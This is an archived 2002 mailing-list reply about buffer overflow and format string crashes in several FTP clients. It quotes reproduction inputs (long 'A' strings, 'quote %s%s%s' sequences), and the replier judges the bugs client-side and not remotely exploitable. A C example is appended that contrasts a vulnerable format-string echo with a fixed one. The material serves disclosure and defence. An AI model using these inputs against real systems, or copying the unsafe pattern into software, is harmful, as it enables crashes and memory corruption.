Vulnerability Development mailing list archives
Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote?
From: Stan Bubrouski <stan () ccs neu edu>
Date: Sun, 05 May 2002 16:02:08 -0400
lion wrote:
> Multiple Local Vulnerabilities in some FTP Client.
>
> 1. Windows 2000 and other Version FTP Client Overflows and Format String Vulnerability.
>
> a.
> d:\>perl -e "printf 'A'x3000"|ftp
> Invalid command.
> ftp>
>
> will see the 0x4141414d memory addr not be read error.
>
> d:\>perl -e "printf 'open '. 'A'x3000"|ftp
> Already connected to (null), use disconnect first.
This is a client-side bug the client themselves would have to exploit, making it irrelevant.
> will see the 0x4141414d memory addr not be read error.
>
> b.
> d:\>ftp localhost
> Connected to lion.
> 220 lion Microsoft FTP Service (Version 5.0).
> User (lion:(none)): ftp
> 331 Anonymous access allowed, send identity (e-mail name) as password.
> Password:
> 230 Anonymous user logged in.
> ftp> debug
> Debugging On .
> ftp> cd AAAAAAAAAA…… ('A' x 500)
> 500 Command was too long
> 421 Terminating connection.
> Connection closed by remote host.
> ftp> debug
> Debugging On .
> ftp> open localhost
> Connected to lion.
> 220 lion Microsoft FTP Service (Version 5.0).
> User (lion:(none)): ftp
> ---> USER ftp
> 331 Anonymous access allowed, send identity (e-mail name) as password.
> Password:
> ---> PASS f
> 230 Anonymous user logged in.
> ftp> cd AAAAAAAAAAAAAAAA……('A'x 2000)
>
> will see the 0x41414141 memory addr not be read error.
Client-side, again no remote threat.
> ftp> ls AAAAAAAAAAAAAAAA……('A'x 2000)
> ---> PORT 127,0,0,1,4,114
> 200 PORT command successful.
> ---> NLST AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA……..
>
> will see the 0x41414141 memory addr not be read error.
Client-side, again no remote threat.
> c.
> d:\>ftp localhost
> Connected to lion.
> 220 lion Microsoft FTP Service (Version 5.0).
> User (lion:(none)): ftp
> 331 Anonymous access allowed, send identity (e-mail name) as password.
> Password:
> 230 Anonymous user logged in.
> ftp> debug
> Debugging On .
> ftp> quote %s
> ---> quote %s
> 500 'QUOTE %s': command not understood
> ftp> quote %s%s%s
> ---> quote %s%s%s?(null)
> 500 'QUOTE %s%s%s (null)': command not understood
> ftp> quote %s%s%s%s%s%s%s%s
> --->
>
> will see the 0x73257325 memory addr not be read error.
>
> Use W32Dasm to disassemble the ftp.exe, we can find the
> 780127A8 mov dword ptr [eax],ecx
> This is a character with win2000 Format Strings Vulnerability.
Client-side, again no remote threat.
> 2. Cygwin version 2.194.2.21 and Redhat 6.2 FTP Client Format String Vulnerability.
>
> lion@LION ~
> $ ftp localhost
> Connected to lion.
> 220 lion Microsoft FTP Service (Version 5.0).
> Name (localhost:lion): ftp
> 331 Anonymous access allowed, send identity (e-mail name) as password.
> Password:
> 230 Anonymous user logged in.
> Remote system type is Windows_NT.
> ftp> debug
> Debugging on (debug=1).
> ftp> quote %s
> ---> %s
> 500 '%S': command not understood
> ftp> quote %s%s%s%s%s%s%s
> Segmentation fault (core dumped)
>
> Who can exploit it by remote?
>
> Sorry for my poor English.:)
>
> Lion
> lion () cnhonker net
> HUC
None of these bugs are remotely exploitable, and the Red Hat 6.2 FTP client was patched over a year ago and it was irrelevant because it was client-side. Nevertheless, these bugs should be fixed at some point for stability of the FTP clients if nothing else.

Best Regards,
Stan Bubrouski
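Added example, not part of the messages above and not taken from any FTP client's source: the kind of fix the reply asks for, applied to the debug echo (`--->`) seen in the sessions. The function names, `CMD_MAX` and the buffer sizes are hypothetical; the first function keeps the defect for contrast, the second passes user text as data and rejects over-long commands.

```c
#include <stdio.h>
#include <string.h>

#define CMD_MAX 512   /* assumed command limit, not from any real client */

/* BEFORE (kept for contrast): the typed command is used as the format
 * string, so "%s" in the input makes the formatter read arguments that
 * were never passed. Behaviour is undefined for such input. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
int debug_echo_unsafe(char *out, size_t outlen, const char *user_cmd)
{
    return snprintf(out, outlen, user_cmd);
}
#pragma GCC diagnostic pop

/* AFTER: fixed format string, command passed as an argument, and the
 * length checked before anything is copied.
 * Returns 0 on success, -1 if the command or the echo line does not fit. */
int debug_echo_safe(char *out, size_t outlen, const char *user_cmd)
{
    if (strlen(user_cmd) >= CMD_MAX)   /* reject, do not truncate silently */
        return -1;
    int n = snprintf(out, outlen, "---> %s", user_cmd);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    char line[CMD_MAX + 8];
    char big[3001];                    /* constructed input: 3000 x 'A' */

    memset(big, 'A', 3000);
    big[3000] = '\0';

    /* Format directives are echoed literally instead of being interpreted. */
    if (debug_echo_safe(line, sizeof line, "quote %s%s%s%s%s%s%s%s") == 0)
        puts(line);

    /* The over-long command is refused before it reaches a fixed buffer. */
    printf("3000-byte command accepted: %s\n",
           debug_echo_safe(line, sizeof line, big) == 0 ? "yes" : "no");
    return 0;
}
```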